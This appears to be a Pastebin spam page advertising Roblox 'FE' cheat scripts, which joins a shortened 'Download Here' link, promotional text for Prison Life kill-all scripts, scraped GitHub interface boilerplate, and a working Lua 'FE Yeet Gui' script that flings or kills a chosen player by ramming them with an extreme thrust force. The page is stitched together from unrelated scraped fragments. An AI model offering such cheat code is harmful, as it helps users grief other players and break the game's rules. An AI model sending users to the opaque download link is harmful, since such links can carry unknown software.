Advertisement
Guest User

Roblox fe hacks

a guest
Nov 11th, 2024
737
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.33 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/rhf4x3dp (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Roblox Prison Life Script Pastebin Hacks – March 2023
  10. Warning: We advise you to use only updated scripts, and sparingly. If for example you use the Kill all players permanently, although it is very fun, they will end up banning you. Of course we also recommend that before you start using them, check that there are no game administrators playing on your same server, because although your Roblox account will not be in danger, they may not allow you to access the game again
  11. FE Destroy Script 2023
  12. Get the this new Kill All Players Script Pastebin for the Roblox game from this link > Here
  13. You can check the script here, but copy and paste from the previous link
  14. Roblox Prison Life Script Pastebin – Kill All Players
  15. Get the this new Kill All Players Script Pastebin for the Roblox game from this link > Here
  16. You can check the script here, but copy and paste from the previous link
  17. Roblox Prison Life Script Pastebin – Kill Selected Player
  18. Get the this new Kill Selected Player Script Pastebin for the Roblox game from this link > Here You can check the script here, but copy and paste from the previous link
  19. YssHacker/Fe-Trolling-GUI
  20. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  21. Name already in use
  22. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  23. Sign In Required
  24. Please sign in to use Codespaces.
  25. Launching GitHub Desktop
  26. If nothing happens, download GitHub Desktop and try again.
  27. Launching GitHub Desktop
  28. If nothing happens, download GitHub Desktop and try again.
  29. Launching Xcode
  30. If nothing happens, download Xcode and try again.
  31. Launching Visual Studio Code
  32. Your codespace will open once ready.
  33. There was a problem preparing your codespace, please try again.
  34. Latest commit
  35. Git stats
  36. Files
  37. Failed to load latest commit information.
  38. README.md
  39. local lp = game:FindService("Players").LocalPlayer
  40. local function gplr(String) local Found = local strl = String:lower() if strl == "all" then for i,v in pairs(game:FindService("Players"):GetPlayers()) do table.insert(Found,v) end elseif strl == "others" then for i,v in pairs(game:FindService("Players"):GetPlayers()) do if v.Name ~= lp.Name then table.insert(Found,v) end end elseif strl == "me" then for i,v in pairs(game:FindService("Players"):GetPlayers()) do if v.Name == lp.Name then table.insert(Found,v) end end else for i,v in pairs(game:FindService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found,v) end end end return Found end
  41. local h = Instance.new("ScreenGui") local Main = Instance.new("ImageLabel") local Top = Instance.new("Frame") local Title = Instance.new("TextLabel") local TextBox = Instance.new("TextBox") local TextButton = Instance.new("TextButton")
  42. h.Name = "h" h.Parent = game:GetService("CoreGui") h.ResetOnSpawn = false
  43. Main.Name = "Main" Main.Parent = h Main.Active = true Main.Draggable = true Main.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Main.BorderSizePixel = 0 Main.Position = UDim2.new(0.174545452, 0, 0.459574461, 0) Main.Size = UDim2.new(0, 454, 0, 218) Main.Image = "rbxassetid://2005276185"
  44. Top.Name = "Top" Top.Parent = Main Top.BackgroundColor3 = Color3.fromRGB(57, 57, 57) Top.BorderSizePixel = 0 Top.Size = UDim2.new(0, 454, 0, 44)
  45. Title.Name = "Title" Title.Parent = Top Title.BackgroundColor3 = Color3.fromRGB(49, 49, 49) Title.BorderSizePixel = 0 Title.Position = UDim2.new(0, 0, 0.295454562, 0) Title.Size = UDim2.new(0, 454, 0, 30) Title.Font = Enum.Font.SourceSans Title.Text = "FE Yeet Gui (trollface edition)" Title.TextColor3 = Color3.fromRGB(255, 255, 255) Title.TextScaled = true Title.TextSize = 14.000 Title.TextWrapped = true
  46. TextBox.Parent = Main TextBox.BackgroundColor3 = Color3.fromRGB(49, 49, 49) TextBox.BorderSizePixel = 0 TextBox.Position = UDim2.new(0.0704845786, 0, 0.270642221, 0) TextBox.Size = UDim2.new(0, 388, 0, 62) TextBox.Font = Enum.Font.SourceSans TextBox.PlaceholderText = "Who do i destroy(can be shortened)" TextBox.Text = "" TextBox.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox.TextScaled = true TextBox.TextSize = 14.000 TextBox.TextWrapped = true
  47. TextButton.Parent = Main TextButton.BackgroundColor3 = Color3.fromRGB(49, 49, 49) TextButton.BorderSizePixel = 0 TextButton.Position = UDim2.new(0.10352423, 0, 0.596330225, 0) TextButton.Size = UDim2.new(0, 359, 0, 50) TextButton.Font = Enum.Font.SourceSans TextButton.Text = "Cheese em'" TextButton.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton.TextScaled = true TextButton.TextSize = 14.000 TextButton.TextWrapped = true
  48. TextButton.MouseButton1Click:Connect(function() local Target = gplr(TextBox.Text) if Target[1] then Target = Target[1]
  49. local Thrust = Instance.new('BodyThrust', lp.Character.HumanoidRootPart) Thrust.Force = Vector3.new(9999,9999,9999) Thrust.Name = "YeetForce" repeat lp.Character.HumanoidRootPart.CFrame = Target.Character.HumanoidRootPart.CFrame Thrust.Location = Target.Character.HumanoidRootPart.Position game:FindService("RunService").Heartbeat:wait() until not Target.Character:FindFirstChild("Head") else notif("Invalid player") end
  50. --//fsddfsdf notif("Loaded successfully! Created by scuba#0001", 5)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement